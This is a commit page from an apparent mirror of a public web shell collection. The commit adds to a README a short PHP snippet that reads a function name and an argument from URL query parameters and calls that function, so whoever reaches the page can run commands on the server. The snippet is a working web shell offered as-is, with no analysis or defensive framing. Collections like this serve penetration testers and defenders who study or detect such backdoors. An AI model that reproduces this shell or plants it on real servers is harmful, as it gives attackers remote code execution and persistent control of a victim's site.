mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
update readme.md
This commit is contained in:
parent
3e85c60510
commit
8eb3d3e519
1 changed files with 11 additions and 0 deletions
|
@ -1,3 +1,14 @@
|
|||
|
||||
|
||||
<img src="11.jpg" alt="alt text" title="Title" />
|
||||
|
||||
|
||||
***************************************************
|
||||
code:
|
||||
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
||||
?>
|
||||
|
||||
***************************************************
|
Loading…
Reference in a new issue